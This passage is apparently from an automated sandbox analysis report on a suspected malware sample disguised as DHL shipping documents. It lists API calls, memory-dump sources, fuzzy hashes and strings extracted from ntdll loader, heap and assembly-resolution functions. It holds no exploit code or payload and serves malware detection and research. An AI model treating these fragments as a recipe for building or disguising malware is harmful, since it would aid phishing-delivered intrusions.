Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 01512BCA Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512BE4

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e37c7785500a2f92e4ab6438ae4cf9035e01ee3deb2d883c79fcd8a9c0895001
Instruction ID: b3ce755368cceb1d4e46cc9d7c08842f2ad6323656f962b75432aadab4fd1100
Opcode Fuzzy Hash: e37c7785500a2f92e4ab6438ae4cf9035e01ee3deb2d883c79fcd8a9c0895001
Instruction Fuzzy Hash: 3DB09B72D054D5C6E612D764560871B7D4077D1715F25C451D1030A55F477CC4D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 015889D0 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

The resource is owned exclusively by thread %p, xrefs: 01588AE4
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01588B46
This failed because of error %Ix., xrefs: 01588BB6
The resource is owned shared by %d threads, xrefs: 01588AEE
*** enter .exr %p for the exception record, xrefs: 01588C61
<unknown>, xrefs: 015889EE, 01588A41, 01588AC0, 01588B09, 01588B87, 01588BFE
*** An Access Violation occurred in %ws:%s, xrefs: 01588BFF
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01588AFF
write to, xrefs: 01588C16
The instruction at %p tried to %s , xrefs: 01588C26
*** enter .cxr %p for the context, xrefs: 01588C7D
The instruction at %p referenced memory at %p., xrefs: 01588BA2
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01588BF4
*** then kb to get the faulting stack, xrefs: 01588C8C
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01588B0B
*** Inpage error in %ws:%s, xrefs: 01588B88
The critical section is owned by thread %p., xrefs: 01588B29
Go determine why that thread has not released the critical section., xrefs: 01588B35
read from, xrefs: 01588C1D, 01588C22
*** Resource timeout (%p) in %ws:%s, xrefs: 01588AC2
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01588CAF
a NULL pointer, xrefs: 01588C50
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01588A75
an invalid address, %p, xrefs: 01588C3F
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01588BED
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01588A93
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01588BE6
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01588A84
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01588A4C
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01588A63

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 077f7ea2d94260e83a8c71eeac5c10de4587e0fbf5e4db463e16696cf486454a
Instruction ID: 315f98ba34b8b18551a50669881d6d5542e979bde2392d6ec96351ca9049ecfe
Opcode Fuzzy Hash: 077f7ea2d94260e83a8c71eeac5c10de4587e0fbf5e4db463e16696cf486454a
Instruction Fuzzy Hash: 46812079A40202BFDB61AE09CC5AE6E7B24FF97A20F50484EF5053F226D7719901CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01552009 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UnloadEventTraceDepth, xrefs: 01552180
MinimumStackCommitInBytes, xrefs: 01552870
ExecuteOptions, xrefs: 01552260
ShutdownFlags, xrefs: 01552161
GlobalFlag2, xrefs: 01552C80
UseImpersonatedDeviceMap, xrefs: 015521DC
DisableExceptionChainValidation, xrefs: 0155241F
@, xrefs: 01552834
LdrpInitializeExecutionOptions, xrefs: 01552E3D
CFGOptions, xrefs: 01552627
FrontEndHeapDebugOptions, xrefs: 01552149
GlobalFlag, xrefs: 01552BFF, 01552D19
minkernel\ntdll\ldrinit.c, xrefs: 01552E47
MaxLoaderThreads, xrefs: 015521AC
MaxDeadActivationContexts, xrefs: 01552A42
DisableHeapLookaside, xrefs: 0155212D
@, xrefs: 01552602
RaiseExceptionOnPossibleDeadlock, xrefs: 01552239
TracingFlags, xrefs: 01552209
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01552E36

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 9cab51be2ea5078182879d2e190eefdf05358d103b9239182e730ee264f71f08
Instruction ID: 1014bdfb4a538b9d0af3717ec8fea65ccb05b7db967894a7e4babaab174129e4
Opcode Fuzzy Hash: 9cab51be2ea5078182879d2e190eefdf05358d103b9239182e730ee264f71f08
Instruction Fuzzy Hash: 17927B71604342EFE761CF29C890B6BB7E8BB84714F14491EFA95DB261D770E844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 015085E0 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread identifier, xrefs: 01545420
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015452F0, 0154537C, 015453FF
Thread is in a state in which it cannot own a critical section, xrefs: 01545429
Address of the debug info found in the active list., xrefs: 01545394, 015453E0
Critical section address, xrefs: 0154530B, 015453A2, 0154541A
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015453C8
undeleted critical section in freed memory, xrefs: 01545311
Invalid debug info address of this critical section, xrefs: 0154539C
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015453B4
double initialized or corrupted critical section, xrefs: 015453EE
Critical section debug info address, xrefs: 01545305, 01545414
Critical section address., xrefs: 015453E8
corrupted critical section, xrefs: 015453A8
8, xrefs: 015451C9

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: bd567c20c4a80cf2a00dcc0c17fb40aec4636806050627c215a4f9f9754ac7b4
Instruction ID: cec6f5041a12703f6db0f90b95afd694d6b94162bb8d07db2a9df658d100b123
Opcode Fuzzy Hash: bd567c20c4a80cf2a00dcc0c17fb40aec4636806050627c215a4f9f9754ac7b4
Instruction Fuzzy Hash: 63818E71A41309AFDB21CF95C881BEEBBB9FB48B14F20401EF905BB291D375A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 015029A9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015423A6
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 0154237E
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015424E8
@, xrefs: 01542481
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015424D1
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015422F8
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015421CA
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015422EF
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0154250A
RtlpResolveAssemblyStorageMapEntry, xrefs: 01542505
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015423EC

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: b8115127564c2fd8e81ad1acfb707c683275c07e5e78f6ab1c5227de94a8cb32
Instruction ID: 03e6a66d560b39362dda8b29c2fb1e0fc917c4fccc0724ff4cf711a6b4df666a
Opcode Fuzzy Hash: b8115127564c2fd8e81ad1acfb707c683275c07e5e78f6ab1c5227de94a8cb32
Instruction Fuzzy Hash: 05025FB1D042299BDB32DB54CC84BDEB7B8BF54304F4045DAA609AB291DB709F84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 01578812 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

svchost.exe, xrefs: 01578838
csrss.exe, xrefs: 01578850
services.exe, xrefs: 01578866
smss.exe, xrefs: 0157885B
runtimebroker.exe, xrefs: 01578843
SegmentHeap, xrefs: 015788B9
heapType, xrefs: 0157889B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 015788A0
DefaultBrowser_NOPUBLISHERID, xrefs: 015789D0
lsass.exe, xrefs: 01578871

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 8a7487d338f2df1f7ef3d975455a8a4bfcb8063a92bad0a47fb195c66759176e
Instruction ID: 2711031a97ced5a7b6643415c5fc07a295d1eb30aaabae922821dd231fa59e63
Opcode Fuzzy Hash: 8a7487d338f2df1f7ef3d975455a8a4bfcb8063a92bad0a47fb195c66759176e
Instruction Fuzzy Hash: 8651B1711043029BD325CF19A84ABABBBECBB94650F54091EFA988B250E770D604C793

Uniqueness

Uniqueness Score: -1.00%

Function 01580985 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 01580CB4
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 01580E62
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 01580D3F
HEAP[%wZ]: , xrefs: 01580B24, 01580B85, 01580C98, 01580D21, 01580DE7, 01580E3B
HEAP: , xrefs: 01580B31, 01580B92, 01580CA5, 01580D2E, 01580DF4, 01580E48
Non-Dedicated free list element %p is out of order, xrefs: 01580B3D
dedicated (%04Ix) free list element %p is marked busy, xrefs: 01580BA1
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 01580E0D

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: bb041dad27872eca554dcafde7de686c257204dbcc7cded617ae6c3c9b78c348
Instruction ID: f162218141123e73adca352b7231f509508972d218c26b9a50dc9ca5edc74f01
Opcode Fuzzy Hash: bb041dad27872eca554dcafde7de686c257204dbcc7cded617ae6c3c9b78c348
Instruction Fuzzy Hash: 3EF11235A00646AFDB25EF68C081BAEFBF4FF15714F04845EE581AF292C770A949DB50

Uniqueness

Uniqueness Score: -1.00%

Function 014DAD40 Relevance: 9.3, Strings: 7, Instructions: 573COMMON

Download Yara Rule

Strings

#, xrefs: 0153359C
LdrpResSearchResourceMappedFile Exit, xrefs: 014DAE2C
MZER, xrefs: 01533607
LdrpResSearchResourceMappedFile Enter, xrefs: 014DAE18
MUI, xrefs: 014DB370
H, xrefs: 014DAE22
J, xrefs: 014DAE0E

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
API String ID: 0-664215390
Opcode ID: f6bf39dac59dd10dfa4666fa91f0a9c41bfc78d163640ca96f337e3b89d267a4
Instruction ID: 786dc7cd6b64503abac3b4f8c0c82ac1cab97ab02a92bda48e091d0e048a876d
Opcode Fuzzy Hash: f6bf39dac59dd10dfa4666fa91f0a9c41bfc78d163640ca96f337e3b89d267a4
Instruction Fuzzy Hash: 94329071A442698BDF22CB18C868BEEB7B5FB45340F1541EBE849AB361D7719E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01558673 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 0155884F
VerifierDlls, xrefs: 0155897D
HandleTraces, xrefs: 0155894F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015586FD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01558727
VerifierDebug, xrefs: 01558965
VerifierFlags, xrefs: 01558910

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 62405894c0fce48441cc5ecc871184325f6977183372de41c9085f7110865a75
Instruction ID: cc6a5c7fd588afbb8f547440981026735410a91ace35d742a62efc7c3c230e7d
Opcode Fuzzy Hash: 62405894c0fce48441cc5ecc871184325f6977183372de41c9085f7110865a75
Instruction Fuzzy Hash: D8911872600B129FD761DFAA88A0B5A7BE5FB50B14F06091EFE516F251D730EC04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01554A97 Relevance: 8.8, Strings: 7, Instructions: 86COMMON

Download Yara Rule

Strings

LdrpProtectedCopyMemory, xrefs: 01554AB4
Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01554AB5
***Exception thrown within loader***, xrefs: 01554AE7
Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01554AF8
LdrpGenericExceptionFilter, xrefs: 01554ABC
minkernel\ntdll\ldrutil.c, xrefs: 01554AC6
Execute '.cxr %p' to dump context, xrefs: 01554B71

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
API String ID: 0-2973941816
Opcode ID: 8b23d212e7b1e27abc9da7e461d2f8b3d6b8ce3e74fffcecfb26580e59142f52
Instruction ID: 8b57b62a6f6a65511686970ff92dd4513e633a3dbf8abd0b13415c2c2b8c5e6c
Opcode Fuzzy Hash: 8b23d212e7b1e27abc9da7e461d2f8b3d6b8ce3e74fffcecfb26580e59142f52
Instruction Fuzzy Hash: 3521B1761001063FE7A99AADDCA6E6E7B59FB81534F340507F9219F560D570DE50C324

Uniqueness

Uniqueness Score: -1.00%

Function 014DE9E0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 014DF1F9
LdrpResSearchResourceInsideDirectory Exit, xrefs: 014DEACC
T, xrefs: 014DEAAE
R, xrefs: 014DEAC2
{, xrefs: 0153459F
LdrpResSearchResourceInsideDirectory Enter, xrefs: 014DEAB8

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 550092bd1805e88c9476f6c3c26e5b38de1eee8a008fbe04ee40be89da4d2a2d
Instruction ID: bf57f439c7083e0c21fb49bf3e20252f1dfd109b3c0f5ffd5be8710149b098a2
Opcode Fuzzy Hash: 550092bd1805e88c9476f6c3c26e5b38de1eee8a008fbe04ee40be89da4d2a2d
Instruction Fuzzy Hash: 6AA22C74A0562A8BDF75DF18C8987ADBBB5BF85304F1442EAD509AB360DB319E85CF00

Uniqueness

Uniqueness Score: -1.00%

Function 015063AF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01543FBE
Delaying execution failed with status 0x%08lx, xrefs: 0154413E
minkernel\ntdll\ldrinit.c, xrefs: 01543FCF, 01544031, 015440F5, 0154414F
Process initialization failed with status 0x%08lx, xrefs: 01544020
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 015440E4
_LdrpInitialize, xrefs: 01543FC5, 01544027, 015440EB, 01544145

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 4402b1c9c53869fd6fc7940b0bac3382ce7d1ec44d2d4c253e73a1b5be1135fd
Instruction ID: 7d0e3e5359d65e4e3f6d702fcf862954f99a10cdd53f562bd8fd9b9adb9046f3
Opcode Fuzzy Hash: 4402b1c9c53869fd6fc7940b0bac3382ce7d1ec44d2d4c253e73a1b5be1135fd
Instruction Fuzzy Hash: 0A915530B407169FEB26DF98D889BAE7BE1FF50B18F160029E9116F2D1D7B09911C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 014C640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0152994C
apphelp.dll, xrefs: 014C6446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01529960
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01529989
minkernel\ntdll\ldrinit.c, xrefs: 01529970, 01529999
LdrpInitShimEngine, xrefs: 01529953, 01529966, 0152998F

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 2165a2718e15056abdedc0ecb52e9148b115dedf48f1bdfbee72107ee8e3b693
Instruction ID: 7d2f54270d3227c5a54ef760ea550dfb9b3aaab6be0f0c56bdd3f0694ad52292
Opcode Fuzzy Hash: 2165a2718e15056abdedc0ecb52e9148b115dedf48f1bdfbee72107ee8e3b693
Instruction Fuzzy Hash: 8351C2712083169FD320DF25D885FAB77E8FB94A58F11491EF5959B2A0D730E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0150C666 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 0154805D, 015480D1
minkernel\ntdll\ldrredirect.c, xrefs: 01548067, 015480DB
LdrpInitializeProcess, xrefs: 0150C683
minkernel\ntdll\ldrinit.c, xrefs: 0150C684
Unable to build import redirection Table, Status = 0x%x, xrefs: 015480CB
Loading import redirection DLL: '%wZ', xrefs: 01548056

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 2021bbf2a249296f910d63718adca9b0d98cb661a802c7f5933bb6d028cea5dd
Instruction ID: 8011342100f37183077119e1930e7a7811bab9b2b47beb8934a46c1640639e1a
Opcode Fuzzy Hash: 2021bbf2a249296f910d63718adca9b0d98cb661a802c7f5933bb6d028cea5dd
Instruction Fuzzy Hash: 3731E0716047429FD224EE69D846E2A77D4FBA0A14F01095DF9459F2A1E630EC04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01502624 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01542046, 01542080, 015420A0
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01542085
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 0154205E
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015420A5
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01542066
SXS: %s() passed the empty activation context, xrefs: 0154204B

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 5c993baac345e8183128d214fb308837f2d9dbda673afe15febf6ff36b0c3953
Instruction ID: 1727b1cc1d65bc1a6d1319aee44aa4c34fea62bd4c7a000aa27f69c1aa872157
Opcode Fuzzy Hash: 5c993baac345e8183128d214fb308837f2d9dbda673afe15febf6ff36b0c3953
Instruction Fuzzy Hash: 71313B32F40225BBEB318EDA9C89F5F7AA8FF95B44F14005ABA057F180D6709E00C6A1

Uniqueness

